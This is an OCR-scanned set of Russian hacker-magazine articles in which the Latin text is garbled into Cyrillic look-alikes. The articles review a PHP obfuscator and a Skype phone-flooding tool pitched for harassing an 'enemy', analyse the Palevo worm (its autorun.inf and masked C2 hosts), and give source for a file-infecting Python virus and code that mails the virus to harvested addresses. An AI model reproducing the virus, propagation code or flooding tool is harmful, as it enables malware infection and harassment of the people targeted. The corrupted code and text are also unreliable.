ров — РНРОЫюзсаІоготсІх. Возможности 
обфускатора: 

• замена имен переменных; 

• замена имен функций; 

• шифрование статических строк; 

• шифрование имен стандартных функ- 
ций РНР; 

• обфускация ШТЕСЕК'ов; 

• сжатие скрипта; 

• архивация скрипта; 

• добавление треш-комментариев ; 

• обфускация констант РНР; 

• возможность добавления мусорных 
инструкций и переменных с заданной 
вероятностью . 

Если учесть тот фа кт, что каждый раз скрипт 
создает совершенно разный 



обфусцированный код, твоим конкурентам 
еще долго придется разгадывать скрипты 
в случае возникновения такой необходи- 
мости :). 



Также стоит отметить и некоторые огра- 
ничения: обфускатор не поддерживает 
конструкции еѵаШ и $$ѵаг_пате, а также 
могут возникнуть проблемы со скриптами в 
кодировке ІІТР-8. 

За обновлениями и авторской помощью не 
забывай своевременно заходить на страничку 
каіті.ги/201 0/1 0/рбр-оЬФгсаІог-І -5 . 

Программа: Ріпд$ Зкурег 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$Га/2008 5егѵег/7 
Автор: 5іпЗѵ 




Телефонный флудер 

Следующей в нашем обзоре идет неплохая 
программа для флуда мобильных и стацио- 
нарных телефонов — Ріпдз Зкурегот коман- 
ды зіпЗѵ.огд . 

Принцип работы данной проги достаточно 
прост: 

1. Набираем номер; 

2 . Ждем начала гудков; 

3. Разрываем соединение; 

4 . Набираем заданный номер заново. 
Функционал и особенности флудера: 



• указание одного номера для флуда; 

• указание списка номеров для флуда 
(загружается из текстового файла) ; 

• указание интервала между разрывом 
соединения и звонком (в секундах) ; 

• указание количества звонков; 

• возможность начать флуд с нача- 
ла списка после прохода по всем его 
номерам; 

• таймер работы флуда; 

• работает через сервис Зкуре, не 
снимая деньги; 

• флуд домашних, мобильных и интер- 
нет-телефонов ; 

• ведение подробных логов; 

• интервал между звонками не превы- 
шает 3-5 секунд. 

Как видишь, данная утилита вполне сможет 
заставитьтвоего недруга сменить номер 
телефона :). 
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В этой статье речь пойдет о черве Раіеѵо - именно он ответственен за 
создание известного ботнета Магіроза. Напомню, что одного из хозяев 
этого ботнета удалось поймать испанской полиции в начале 2010 года. 
Сам червь обладает весьма обыденным функционалом: распространение 
с помощью аиіогип.іпі через съемные носители, установка в 
автозагрузку, закачка файлов, показ рекламы и прочее. 



Итак, я взял один из последних и самых свежих вариантов Раіеѵо и 
приступил к его последовательному разбору. Для начала — общие 
характеристики. 

Файл представляет собой РЕ’шник размером в 166 Кб, в котором 
присутствуют ресурсы. В ресурсах содержатся иконки, которые очень 
похожи на иконки папок, отображаемых Ехріогег’ом. Безусловно, 
это сделано для того, чтобы сбить с толку неопытного пользовате- 
ля, который не сможет отличить настоящую папку от исполняемого 
файла. Также в ресурсах содержатся два Зігіпд ТаЫе, в которых 
находятся фэйковые строки. Все эти ухищрения используются созда- 
телями малвари для того, чтобы файл стал выглядеть более «обыч- 
но». Ресурсы я дергал с помощью Резоигсе Наскег’а. Названия 
четырех секций стандартны: Тех!, .гбаіа, .баіа и .гзгс, а вот название 
пятой, по-видимому, было сгенерировано случайным образом — 

Ѳ]д русіі. Причем в заголовке она идет второй, а не последней. Так 
что же интересного мне удалось найти при помощи визуального 
просмотра в Ніеѵѵ? Почти весь файл зашифрован, однако у меня 



получилось идентифицировать закриптованный РЕ-заголовок «вши- 
того» файла. Он обведен на скриншоте красным овалом. Помимо 
этого, несколько экранов занимают случайным образом сгенериро- 
ванные предложения. В этих предложениях есть и точки, и запятые, 
и рандомные слова. Каждое из слов начинается с большой буквы. 

В ходе дальнейшего исследования выяснилось, что все эти строки 
бесполезны и добавлены в файл лишь для создания энтропии. 

Более ничего интересного в ходе осмотра файла в Ніеѵѵ я не обна- 
ружил. Таким образом, после предварительного анализа удалось 
выяснить, что файл сильно косит под нормальный и, по сути, явля- 
ется дроппером, так как содержит зашифрованный РЕ-заголовок. 

Отлаживаем! 

Следующий этап — непосредственный разбор под отладчиком. 

В качестве последнего я использовал ЮА, применяя по необхо- 
димости декомпилятор Нех-Рауз. Сразу же после начала анализа 
я, не слишком удивившись, обнаружил несколько бессмысленных 
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Фрагмент червя Раіеѵо 
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вызовов АРІ-функций. Например, беіСоплтапсіипеѴѴ возвращает 
результат в ЕАХ. А в коде, который представлен на иллюстрации 
вслед за абзацем, видно, что после вызова АРГшки регистр ЕАХ 
заполняется произвольным значением. А затем идет реализация 
одного из методов антиэмуляции. 

Вот как это работает. Вызывается функция ОрепРгосезз, которая, как и 
любая другая функция, использует стек для хранения своих локальных 
переменных. После ее исполнения происходит обращение к исполь- 
зованному стеку, расположенному выше текущего Е5Р, при помощи 
инструкции МОѴ есх, [езр-1 СИ]. В системе ѴѴіпбоѵѵз ХР по адресу (Е8Р 
— 0x1 С), в данном контексте, располагается дворд ОхРРРРРРРР. Далее 
этотдворд используется в арифметической операции для вычисления 
адреса дальнейшего перехода при помощи РЕТІЧ. 

Такие техники я обнаружил сразу в нескольких местах во время раз- 
бора этого экземпляра Раіеѵо. Первым фрагментом кода, несущим 
полезную нагрузку в файле, оказался небольшой цикл, который рас- 
шифровывал другой участок кода. Цикл невероятно простой: 

асісі сі , [еах] * 4 [000424СЗА] , 06В9700ВА 
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Фрагмент декомпилированного кода дропа 



стр еах, 00000013Б 
ЗІ 000401110 

Вся расшифровка заключена в одном АОО’е. Потом с помощью 
ѴігІиаІАІІос’а выделяется дополнительная память, куда копируется 
только что расшифрованный участок кода. Туда же передается и 
последующее управление. Часть дальнейшего функционала до боли 
знакома. Это получение адреса кегпе132.сШ в памяти с помощью 
РЕВ’а и получение адресов экспортируемых функций по их хэшам. А 
далее, как и ожидалось, происходит выделение еще одного участка 
памяти, копирование туда зашифрованного РЕ’шника, который я 
увидел в самом начале с помощью Ніеѵѵ, и его расшифровка. Однако 
здесь применяется уже более сложный алгоритм, нежели просто АОР. 
В конечном итоге этот код с помощью нехитрой техники запускает 
расшифрованный файл в адресном пространстве исходного про- 
цесса. Что интересно, в коде, отвечающем за все эти операции, я 
обнаружил строку Могрбех РЕ32 І_оасІег. Вполне возможно, что это 
какой-то купленный автоматизированный загрузчик зашифрованных 
РЕ-модулей. Для удобства я сдампил часть адресного пространства, 
в котором располагается расшифрованный модуль, и сохранил его 
на диск как отдельный файл. В дальнейшем я буду называть этот 
файл дропом, чтобы отличать его от оригинального Раіеѵо. 

После двадцати минут исследования оказалось, что дроп крайне 
примитивен. Написан он на М5ѴС8 без каких-либо ухищрений типа 
обфускации или антиэмуляции. Оно и понятно: этот файл должен 
располагаться только в памяти, а не на диске. Основной его функ- 



ционал — расшифровать код и проинжектить его в ехріогег.ехе. 
Нех-гауз хватило около полутора экранов, чтобы поместить там весь 
функционал дропа. Если описывать его действия более подробно, то 
вначале он расшифровывает шеллкод, затем ищет окно с классом 
Ргодтап и, в случае успеха, получает Ю процесса, которому при- 
надлежит это окно. Далее дроп открывает сам процесс, выделяет 
в нем память с помощью ѴігІиаІАІІосЕх, записывает туда шелл-код 
посредством ѴѴгіІеРгосеззМеппогу и запускает удаленный поток с 
помощью СгеаІеРетоІеТЬгеаб. Напомню, что окна с классом Ргодтап 
принадлежат ѴѴіпбоѵѵз Ехріогег. Итак, мы пришли к тому, что весь 
полезный функционал располагается в шелл-коде, который внедря- 
ется в процесс ехріогег.ехе. Что же в действительности он делает? 
Вначале — совсем общие вещи, а именно: прописывает автозагрузку 
по ключу НКЕМ\50РТѴѴАРЕ\Місгозоіі\ѴѴіпсіоѵѵ5 І\ІТ\СиггепіѴегзіоп\ 
ѴѴіпІодоп\ТазкВаг и копирует оригинальный файл в папку пользова- 
теля. Любопытно, что зловредный поток через небольшие интервалы 
времени проверяет содержимое ключа ТазкВаг и, если что-то не в 
порядке, восстанавливает его. Также я нашел распространение через 
аиіогип.іпб Интересно, что строка, которая будет выдаваться пользо- 
вателю при нажатии правой кнопкой мыши по съемному устройству, 
написана на испанском языке. Вот и весь аиіогип.іпі целиком: 

зАе11ехесиЦе=ѵікірікі\\\газ Іаиз . ехе 

аскіоп=Ореп ЕоІЛегако ѵіехѵ ііііез изіпдаМпсІомзаЕхрІоге 

ІІЗЕАІІТОРЬАУ=1 
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Фрагмент кода, отвечающий за расшифровку встроен- 
ного исполняемого файла 



Б8ВЗ зкагкесі 
Асіѵегкізіпд : %з 

Асілгаге2 зкорресі, %сІ ШБз сіізріауесі 
Асілгаге аігеасіу гиппіпд 
Асімаге пок гиппіпд 

Ас1маге2 гиппіпд: %с! Ьгоѵ^зегз, %сІ ІШБз 



ореп=ѵікірікі \ \ \газ Іаиз . ехе 
ісоп=зке1132 . сЗ.11 , 4 

зке11\\\Іпзка11\\\сошшапсі=ѵікірікі\\\газ1аиз . ехе 
зЬе11\\\ореп\\\сошшапсі=ѵікірікі\\\газ Іаиз . ехе 
зке11\\\ехр1оге\\\сошшапсі=ѵікірікі\\\газ1аиз . ехе 
Зке 11 \\\ореп\\\соттапсі=ѵікірікі\\\га 9 Іаиз . ехе 
з!іе11ехесике=ѵікірікі\\ \газ Іаиз . ехе 

Кроме того, было выявлено, что червь пытается подключиться к 
одному из нескольких серверов по следующим адресам: 

******_ апапікоііс . зи 
* * * * . ріекекіозагзке . ги 
*****. рогпісагке . сот 
*****. іозшіЬгасаІа . огд 
92 . *** . *90 .237 

После этого он ожидает команд от центра управления. Вот некоторые 
строки, которые используются в качестве ответов командному центру: 

БОКЕ! 

РАІЬ! 

Бгіѵе іпіескесі: %с 

ІІЗВЗ зкорресі, %й іпіесВес! 

ІІЗВЗ пок гиппіпд 
ІІЗВЗ аігеасіу гиппіпд 



Еггог=%сі , СЬЕ=%сі 
Аігеасіу (іошііоасіесі ісі.= %сі. 

Боѵ^піоасііпд %з ко %з 
Бопе, %з 

Как можно понять из этих строк, в функционал Раіеѵо входит 
скачивание других файлов по команде и показ рекламы. Кстати, 
шелл-код не сразу содержит все данные в открытом виде. 

Вначале прогоняется большой цикл для их расшифровки, после 
чего эту память становится возможным спокойно дампить и под- 
робно рассматривать в Ніеѵѵ и/или ЮА. 

Заключение 

Как видишь, этот червь оказался совсем не страшным. Конечно, 
его разработчики применили кое-какие трюки для усложнения 
анализа — несколько антиэмуляционных техник, фэйковые вызовы 
АРГшек и инжект в память другого процесса. Но разве они способ- 
ны нас напугать :)? 

Да, кстати, чтобы остаться в системе, малварь прописывается в 
автозагрузку в реестре и непрерывно мониторит соответствующий 
ключ из созданного потока в процессе ехріогег.ехе. Распространение 
через аиіоги п.іпі — уже прошлый век. Учитывая, что Раіеѵо может 
скачивать файлы и показывать рекламу по команде, разработчики, 
скорее всего, используют его для распространения других «зака- 
зов». А это могут быть как рекламные программы, так и зловреды, 
крадущие персональные данные, щ 



Ісоп Огоир и Зігіпд ТаЫе ы, выдернутые из Раіеѵо 
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Изучаем возможности полноценного злокодинга 
на интерпретируемом языке 



Новый год - самое время для легких извращений. Хотя для тебя, 
читающего эту статью практически весной, год уже не новый, да и сама 
идея изучения вируса, написанного на питоне, может показаться вовсе 
даже нелегким извращением... 



Как известно, с помощью питона можно решать множество повсед- 
невных, рутинных задач: периодическое резервное копирование 
файлов, отправка писем по электронной почте, поиск и выполне- 
ние различных действий с файлами на жестком диске и прочее. 

Так как РуіЬоп является языком программирования высокого уров- 
ня, то и вирусы на нем можно писать соответствующие. 

Зловреды, созданные с помощью ЯВУ, обычно классифицируются 
как НПх (НідЬ І_еѵеІ І_апдиаде, х — метод размножения). 
Существуют три основных подвида НПх-вирусов: оверврайтеры 
(Оѵегѵѵгііе) — НПО, компаньоны (Сотрапіоп) — НПО и паразиты 
(Рагазіііс) — НІ_І_Р. 

Первые являются достаточно примитивными программами, кото- 
рые просто перезаписывают код жертвы своим кодом, вследствие 
чего оригинальная программа перестает существовать. Такие виру- 
сы очень просты и весьма разрушительны. В результате эпидемии 
такой заразы пользовательский компьютер практически полностью 
лишается всего установленного ПО. Ничем иным кроме вандализ- 
ма это назвать нельзя. 

Вирусы-компаньоны более гуманны к исполняемым файлам, кото- 
рые они «заражают». Слово «заражают» я специально взял в кавыч- 
ки, так как на самом деле НПС-зловреды просто присваивают себе 



имя жертвы, а оригинальный экзешник переименовывают (а могут 
и зашифровать — прим, ред.) во что-нибудь другое. Таким образом, 
они подменяют пользовательский софт своими копиями, а для боль- 
шей маскировки запускают оригинальную программу из файла с 
новым именем. И пользователь доволен, и вирус остался жив. НИР 
являются самыми продвинутыми из ЯВУ-вирусов. Они внедряются 
непосредственно в файл-жертву, сохраняя при этом работоспособ- 
ность оригинального кода. Из-за особенностей высокоуровневых 
языков программирования полноценного инжекта, как у «взрослых» 
вирусов на ассемблере, добиться очень сложно. Поэтому паразиты 
получаются не слишком элегантными созданиями, но, к сожалению, 
это практически потолок того, что можно выжать из ЯВУ. 

В связи с тем, что как НПО-, так и НПС-вирусы слишком прими- 
тивны и практически не встречаются в дикой природе, мы займем- 
ся разработкой здовреда-паразита. Основной метод, используемый 
ими для заражения — внедрение в один файл с кодом-жертвой. 
Таким образом сохраняется код оригинальной программы, и при 
этом не появляется никаких лишних следов. 

Существует много вариаций на тему НПР-зловредов, но мы реа- 
лизуем самую простую из них. Вирус будет писать в начало файла- 
жертвы свое собственное тело — целиком, со всеми заголовками 
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и служебными структурами. Код «хорошей» программы 
при этом будет смещен на длину вируса. То есть, сна- 
чала будет выполняться вирус, который в конце своего 
черного дела запустит оригинальную программу, чтобы 
лишний раз не вызывать подозрения у пользователя. По 
традиции взглянем на код: 

Код НІ_І_Р-вируса 

ітрогЦ зуз 
ітрогЦ оз 
ітрогЫ зЬиЪіІ 

ѵігРаЪЪ. = оз . раЫЬ . зрІіД ( зуз . агдѵ [ 0 ] ) ; 
патез = оз . ІізЪсііг ( 1 . ' ) ; 

іѵіг = ореп ( зуз . агдѵ [ 0 ] , ' гЬ ' ) ; 

ѵігБаЪа = іѵіг . геасі ( 19456 ) ; 

іог паше іп патез : 

патеРаіг = оз . раЫЪ. . зрііЪехЦ (пате) ; 
іі патеРаіг [1] == 1 . ехе ' апсі \ 

пате != ѵігРаЪЪЦІ] : 
оз . гепате ( пате , пате + 1 Стр ' ) ; 
іргод = ореп (пате + ' Ътр ' , 1 гЪ'); 

ргодБаДа = іргод . геасі ( ) ; 

іпем = ореп ( пате , 'ѵіЪ' ) ; 
іпеѵ/. ѵпгіДе (ѵігБаЪа + ргодБаЪа) ; 

іпеілп сіозе ( ) ; 
іргод . сіозе ( ) ; 

оз . гетоѵе ( пате + 1 Стр 1 ) ; 

огідРгодБаЪа = іѵіг . геасі ( ) ; 
огідРгод = 'огідіпа1_' + ѵігРаЫі[1]; 
іогід = ореп (огідРгод , ' чл/Ь'); 

іогід . члпгіБе (огідРгодБаБа) ; 

іѵіг . сіозе ( ) ; 
іогід . сіозе ( ) ; 

оз . ехесі (огідРгод, 1 '); 

Первым делом мы подключаем три модуля: зуз, оз, 
збиііі. Модуль зуз дает доступ к переменным, которые 
тесно связаны с интерпретатором или с выполняемым 
скриптом. Так, например, мы получаем имя выполняе- 
мого скрипта с помощью команды зуз.агдѵ[0]. Модуль 
оз дает возможность выполнения команд, зависящих 
от операционной системы. Например, получить список 
файлов в директории, произвести над ними некоторые 
операции и так далее. Наконец, модуль збибі дает 
возможность копировать и перемещать файл на жест- 
ком диске. 

После импорта нужных нам модулей мы узнаем имя 
файла, в котором содержится исходный код вируса. 
Затем с помощью команды озТізІбігС.') получаем 
список файлов в текущей директории и проверяем, 
является ли очередной объект в списке экзешником. 
Если проверка это подтверждает, то инфицируем най- 
денный файл, просто заменив его собой. 

Если ты читал внимательно, то заметил, что в условии 
оператора присутствует еще вот такая инструкция: 
пате != ѵі гРаіЬ [ 1 ], а перед этим выполняется команда 




В емаксе тоже можно кодить на питоне 



ѵігРаіЬ = оз. раіЬ .зріііізуз.а гдѵ[0] ) . Для чего это нужно, 
я расскажу в конце статьи, а пока двинемся дальше. 
Перед оператором К мы считываем в память собствен- 
ное содержимое. Делается это с помощью команды іѵіг. 
геасК 1 9456). Число 19456 — это длина вируса (мы ведь 
должны учесть, что в файле находится не только вирус, 
но и жертва). Почему эта длина именно такая, я скажу 
чуть позже. Следующим шагом находим в текущей 
папке все ехе’шники и заражаем их. Для этого, зара- 
нее переименовав невинную программку, мы читаем ее 
код в буфер, затем создаем новый файл с нужным нам 
именем и пишем туда сначала тело вируса, а после — 
считанный только что буфер. Далее сохраняем все это 



Литературы по питону предостаточно. 
В том числе и на английском 





> ѵѵагпіпд 

Написание 
вирусов — уголовно 
наказуемое 
дело. Никогда 
не занимайся 
такими вещами! 
Информация, 
представленная в 
статье, опубликована 
исключительно в 
образовательных 
целях. 
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Питон штука кроссплатформенная, можно и под Ііпих что-нибудь наваять 



хозяйство и удаляем оригинальный файл жертвы с помощью команды 
05.геплоѵе(пате+ ' ітр ' ) . 

Теперь наступает самый ответственный момент — нам надо запу- 
стить оригинальный код, который мы предварительно засунули 
внутрь зловреда. Для этого просто читаем оставшиеся данные из 
образа вируса (мы ведь помним, что уже читали 19456 байт и указа- 
тель сместился в файле на эту позицию?), а затем сохраняем полу- 
ченные данные во временный ехе, который потом запускаем. Таким 
образом вирус корректно отработал, и при этом запустил нужную для 
пребывающего в счастливом неведении пользователя программу. 
Конечно, наш зловред получился вовсе не без недостатков. 
Например, он не проверяет, инфицирован ли уже экзешник 
или нет, да и вбивать в код размер конечного файла вируса 
— не совсем удачное решение. Кроме того, у нашего питомца 
будут возникать проблемы при первом запуске, когда в образе 
находится только тело виря, а тело жертвы отсутствует. Но все 
эти проблемы при определенном старании вполне решаемы. 
Главное для нас — продемонстрировать принцип работы. 

Сетевой червь 

Мы сделали классического инфектора, который распространяется 
путем заражения близлежащих программ. Но ведь есть еще и 
сетевые черви, которые используют интернет для порабощения 
мира. Зловреды такого типа не интересуются файловой системой 
компьютера, им нужен доступ в сеть. 

Для распространения черви пользуются дырами в операци- 
онной системе и прикладных программах, рассылают себя по 
электронной почте и так далее. Мы попробуем сделать вирус, 
который будет использовать именно е-таіГы. 

Для начала давай посмотрим, как с помощью Руібоп отправить 
письмо. Небольшой примерчик, от которого мы будем отталки- 
ваться в дальнейшем: 



Отправка письма 

ітрогС зтірІіЬ 

ігот етаіі .тіте . СехС ітрогС МІМЕТехЦ 
тзд = МІМЕТехЦ ( ' Меззаде СехЦ ' ) 

# те == етаіі отправителя 

# уои == етаіі получателя 

тзд [ ' ЗиЬд есС ' ] = ’ТезЕ теззаде' 
тзд [ * Егот *| = те 
тзд [ 1 То 1 ] = уои 

з = зтСрІіЬ . ЗМТР ( 1 ' ) 

з . зепсітаіі (те , [уои], тзд . аз_зігіпд ( ) ) 
з . диіі ( ) 

Здесь мы используем библиотеку зтІрІіЬ и входящий в нее пакет 
МІМЕТехГ Код настолько прост, что не требует особых разъясне- 
ний. Единственное, на что стоит обратить внимание, так это на 
авторизацию на БМТР-сервере. Если для отправки сообщения 
требуется ввести логин и пароль, то придется вызвать еще одну 
дополнительную функцию. Так как наш вирус является файлом, нам 
надо приаттачить его к письму. Для этого придется импортировать 
еще пару дополнительных библиотек и написать немного кода. 
Будет это выглядеть примерно так: 

Отправка письма с вложением 

ітрогі зтЦрІіЬ 

ітрогі тітеіурез 

ігот етаіі ітрогС епсосіегз 

ігот етаіі . тіте . тиІСірагС ітрогі МІМЕМиШірагС 
ігот етаіі . тіте . Ьазе ітрогі МІМЕВазе 
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Работа над вирусом в самом разгаре 

оиіег = МІМЕМиІіірагі ( ) 

# ше == ешаіі отправителя 

# уои == ешаіі получателя 

оиіег [ ' Зикд есі ' ] = ' Тезі шеззаде' 

оиіег [’ Егот ’ ] = те 

оиіег ['То'] = уои 

сіуре, епсосііпд = тітеіурез . диезз_Руре (раіЦ_іо_іі1е) 
іі сіуре із Ыопе ог епсосііпд із поі Ііопе : 
сіуре = 1 арріісаііоп/осіеі-зігеаш ' 

шаіпіуре, зиЬіуре = сіуре . зрііі ( ' /' , 1) 

ір = ореп (раіЬ_іо_іі1е , 'гЪ') 

шзд = МІМЕВазе (шаіпіуре , зиЬіуре) 
шзд . зеі_рау Іоасі ( ір . геасі ( ) ) 
ір . сіозе ( ) 

епсосіегз . епсос!е_Ьазе64 (шзд) 

шзд . асІсМтеасіег ( ’ Сопіепі-Бізрозіііоп ’ , 

1 аііасЬшепі 1 , Іі1епаше=іі1е_паше) 
оиіег . аііасЪ. (шзд) 

з = зшірІіЬ. 8МТР ( ’ ’ ) 

з . зепсішаіі (те , [уои], оиіег . аз_зігіпд () ) 
з . диіі ( ) 

В импорте у нас появилась библиотека тітеіурез, а также 
модули епсосіегз, МІМЕМиІіірагі и МІМЕВазе. МІМЕМиІіірагі 
позволяет формировать емайл-сообщение из различных видов 
данных (текст, картинки и прочее). МІМЕВазе работает с фай- 
лами произвольного типа — например, ехе. В качестве основы 
сообщения мы берем переменную типа МІМЕМиІіірагі и добав- 
ляем к ней объект МІМЕВазе, в который предварительно счита- 
ли и декодировали в Ьазе64 содержимое нужного нам файла. 
Теперь, когда вирус может сам себя отправлять в электронном 



сообщении, дело осталось за малым — найти, кому отправить 
е-таіі. Тут полет фантазии вирмейкера на питоне ничем не 
ограничен. Можно, например, поискать адреса на жестком 
диске, просканировав все имеющиеся на нем файлы. А можно 
воспользоваться адресной книгой Оиііоок. Для последнего тебе 
понадобится пакет Руібоп ѴѴі п32 Ехіепзіопз. 

Несколько замечаний 

Самые сообразительные могут задать один маленький вопрос: 
«Питон — это скрипты, а ехе — бинари. Как скриптом можно 
заразить исполняемый файл ѴѴіпбоѵѵз?». Ответ на него очень 
прост — питоновские скрипты можно конвертировать в ехе- 
файлы. Да-да, и делается это очень легко. Тут я описывать 
процесс не буду (ты ведь не хочешь, чтобы младшая сестренка, 
взяв в руки ][, получила бы исчерпывающее руководство по 
уничтожению твоего же компа :)), так что за подробностями — к 
Гуглу. 

В связи с тем, что наши вирусы будут выполняться не как скрип- 
ты, а как полноценные ѵѵіп-приложения, в коде встретилась 
пара непонятных вещей, о которых я обещал рассказать позже. 
Первая из них — это вызов оз.раіЬ.зрІііП. Дело в том, что если 
мы запускаем питон-скрипт, то команда зуз.агдѵ[0] возвраща- 
ет имя этого скрипта (например, ѵігиз.ру). В случае же с ехе- 
файлом результат будет другой — полный путь и имя экзешника 
(СДѴѴіпсІоѵѵзѴ/ігиз.ехе). А так как для дальнейших злодеяний нам 
нужно только имя файла, то мы вызываем оз.раіЬ.зрІііП. 

Еще одна загадка — это число 1 9456. Но тут уже легко можно 
догадаться, что это размер ехе, полученного после конверта- 
ции скрипта. Ровно столько у меня весил зловред после своего 
перерождения в бинарный формат. 

Заключение 

Конечно, написание зловредов на Руібоп — то еще извраще- 
ние, но при большом желании такие поделки можно отшлифо- 
вать до нужной степени работоспособности, поставить на полку 
и всем показывать. К тому же вирус будет кроссплатформенным, 
а этим не каждый крутой вирмейкер может похвастаться :). т 
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днятая целина 



Осваиваем и обустраиваем консоль 



• Настроенный по дефолту терминал - унылое зрелище, отпугивающее 
новичков и наводящее тоску на гуру. Многое из того, что способен дать 
командный интерпретатор пользователю, оказывается скрыто за семью 
замками, а то, что остается доступным - просто неудобно. Перед тем, 
как консоль станет действительно сподручным инструментом, придется 
изрядно попотеть. 



Полезная инфа 
в приглашении 

Приглашение командного интерпретатора 
ЬазЬ формируется на основе содержимого 
переменной окружения Р51 . Если верить 
тап-страницам, эта переменная может 
содержать любые строки, а также довольно 
большой набор специальныхуправляющих 
символов, которые при выводе приглаше- 
ния будут превращены в актуальные дан- 



ные. Так, например, в дистрибутиве ІІЬипІи 
содержимое переменной Р81 выглядиттак: 

' $ { (ТеЬіап_сЬгооС : + ( $сІеЬіап_ 
сіігооС) } \и@\Ъ: \ѵ?\ $ ' 

А при выводе на экран превращается во всем 
знакомую строку вида: 

юзер@имя_хоста : текущий_каталог$ 



Нетрудно догадаться, что юзер здесь появ- 
ляется за счетуправляющего символа Ли', 
имя хоста — за счет'ѴѴ, а текущий каталог 
— это 'ѴлЛ Неуклюжая запись, содержащая 
в себе слова беЬіап_сЬгоо1:, это всего лишь 
индикатор того, находится ли пользователь в 
сбгооі-окружении. Такое лаконичное пригла- 
шение, конечно, удобно, но содержит далеко 
не всю информацию, которую Ьазб способен 
отобразить. В его арсенале есть как минимум 
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аиіоітасі- "ъурезеЕ -іи" 

&уй«ЕМ І ^ 

с?І-_дс1 

с!а--сІоиг 

сир- ' /ияг/Ып/сѵз ~іці9 ир -РсІ т 

4С-"4Е -Ъ' 

-Н* 

Ед- Ед 

і Ьр ~ ' іЬр -ЗгшУ" 

^ипеі. іоп и - 1 нурй йй с - Е 1 

Іі — 1 ! г: -Л | тоге 1 

ІіалЬ-'йІІлз -С 

I] 1 3 Ли і у - 1 Гн.^ ] ^ 

і пЕедег- 1 іуре зе С -1 1 

I зИ гірн- 1 і 1 аЬе 1 ^ЦЁВДВДНО^ТЫаМё і^И-у) 

3- г 5оьв -1" 

1оСй1-!;урк;уйс 

Іодіп^ехее іодіп 1 
ІодоиС-ехіС 
1я-Че -СГ 1 
лоЬир - 4 лоЬир 1 

пгоі * 4 пгаІІ -Тансіі -піал-гіос' 
о- 'Ед %- а 

р-'рд I ■ 

рАпд'-'ріггд -ѵеЗ 1 



Команда аІіа$, вызванная без аргументов, 
выдает перечень используемых псевдонимов 

два десятка различныхуправляющих последовательнос- 
тей, о которых многие пользователи даже не подозрева- 
ют. Вот список наиболее интересных из них: 

\б — текущая дата 

\3 — количество фоновых заданий 

\А — текущее время 

\ ! — номер команды в истории 

Крометого, в Р51 вполне можно использовать текущие 
переменные окружения, а если учитывать, что перед 
каждым выводом на экран Р81 перечитывается, то туда 
можно засунуть та кие вкусности, как, например, статус 
последней выполненной команды (переменная $?), 
чтобы знать, было ли ее исполнениеуспешным. 
Управляющий символ '\п' также допустим в Р51 , поэтому 
приглашение к вводу можно сделать многострочным, а 
заодно визуально отделить его от остального текста (с 
помощью начальной пустой строки): 




ипгеаб_таі1 ( ) { 

# Имя пользователя и пароль (без ©дтаіі.сот) 
Іосаі 1одіп= "логин" 

Іосаі раз зѵгогб= "пароль" 

ѵ^деб --зесиге-ргобосо1=ТЬЗѵ1 --бішеоиб=3 
-б 1 -д -О — Ьббрз : / / $ { Іодіп} : $ {раззтлгогб} @ 
таіі . доодіе . сот/таіі/бееб/абот --по- 
сЬеск-сегбібісабе I дгер биіісоипб | зеб 
" з/<би11соипб>\ ( . *\) <\ /би11соипб>/ \1/ " 

} 

# Сигнал Мі-Рі 

Ѵ7І6І ( ) { 

/зЪіп/ітлгсопбід члгІапО I дгер (Хіаіібу I сиб -б 
= -62 | аѵ/к ' {ргіпб $1} * 

} 

Р31 = ' Хп'меабкег ' : х ипгеаб_таі1 ' : 'ш.6і' : \*Лп\ 
и@\к:$?\$ 1 

Все это нужно поместить в конец -/.ЬазЬгс и выставить на 
файл права 600, чтобы никто не смог подсмотреть пароли. 
Результат будет примерно таким: 

-7:32:70/70: /изг/ Іосаі 
3 1т@13 13 : 0$ 



Р81= 1 \п\ѵ\Дп\и@\Ь.: $?\$ 1 

Но и это еще не все. Пример с индикатором сЬгооІ- 
окружения показывает, что в приглашении можно 
использовать вывод любых сторонних приложений, а 
это открывает просто безграничные возможности по 
его кастомизации. Например, следующим образом в 
приглашение можно добавить данные отекущей пого- 
де, количестве непрочитанных писемвдтаііи уровне 
сигнала ѴѴі-РІ: 

$ѵі -Ѵ.ЬазИгс 

# Соодіе-погода 
ѵ/еабЬег ( ) { 

# Где мы? 

Іосаі сібу= "Мозсом" 
сигі -з "Ьббр :/ /ѵллплы доодіе . сот/ ід/ 
арі?меабЬ.ег=$сібу " I зеб ’ з I . *<бешр_с баба= " \ 

(!р"]*\) "/>. * РІИ г 
} 

# Соодіе-почта 



Раскрашиваем 

консоль 

При работе в консоли пользователь часто получает боль- 
шое количество никак не отформатированной инфор- 
мации. Порой выбрать в потоке данных действительно 
необходимое довольно сложно. Благодаря специальным 
непечатаемым езсаре-последовательностям мы можем 
изменить цвет и фон выводимых символов, чтобы облег- 
чить восприятие данных. 

Все езсаре-последовательности заключаются в \[\033[ 
и \], а после кода цвета должна еще стоять буква т. Все 
цвета расписаны в справочной странице. Например, 
черному соответствует 0;30, зеленому — 0;32, красному — 
0 ;3 1 , желтому — 1 ;33, белому — 1 ;37 и так далее. Чтобы в 
строке приглашения выводились имя системы (символ И) 
и логин пользователя (и), подсвеченные красным цветом, 
а текущий каталог — желтым (ѵѵ) , в конфиге -/.ЬазЬгс 
заменяем значение переменной Р51 на следующее: 

Р31="\ [ \ 03 3 [0;31ш\] \и@ѴЬ:\ [ \ 03 3 [ 1 ; 33ш\ ] (\от) \ 




> ІПІО 

• Во РгееВЗБ 
использовать гзупс 
для получения 
прогресса 

копирования файлов 
нет смысла. Можно 
просто нажать 
< Сігі+Т > во время 
работы команды ср, 
и она сама выдаст 
прогресс операции 
на экран. 

• Чтобы сделать 
тап-страницы 
цветными, установи 
пакет тозі с 
помощью пакетного 
менеджера и добавь 
строку «ехроН 
МАЫРА0ЕР="/изг/ 
Ьіп/тозі -з» в файл 
-/.ЬазЬгс. 

• Команда «зНу 
-есбо» отключает 
вывод в терминал 
того, что набирается 
на клавиатуре. 
Подобное поведение 
можно наблюдать 
при вводе пароля 
при логине в 
терминале. 

• Убрать курсор 
из терминала и 
выключить гашение 
экрана можно с 
помощью команд 
«зеНегт -сигзог оИ» 
и «зеНегт -Ыапк О». 




НТТР://ѴѴѴШ 



1 I 

> Ипкз 

• Сайт разработчика 
Ьгіипе-тоб-ги: 
Іаск.кіеѵ.иаЛогіипе- 
тоб-ги 



• Сайт проекта ЬазЬ- 
ОігВ ( 0 і гесіогу Воок- 
тагкз Іог ВА5Н): 

бігЬ.іпІю/ЬазІіРігВ . 
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ІШІХОЮ 



-V- ~ X 



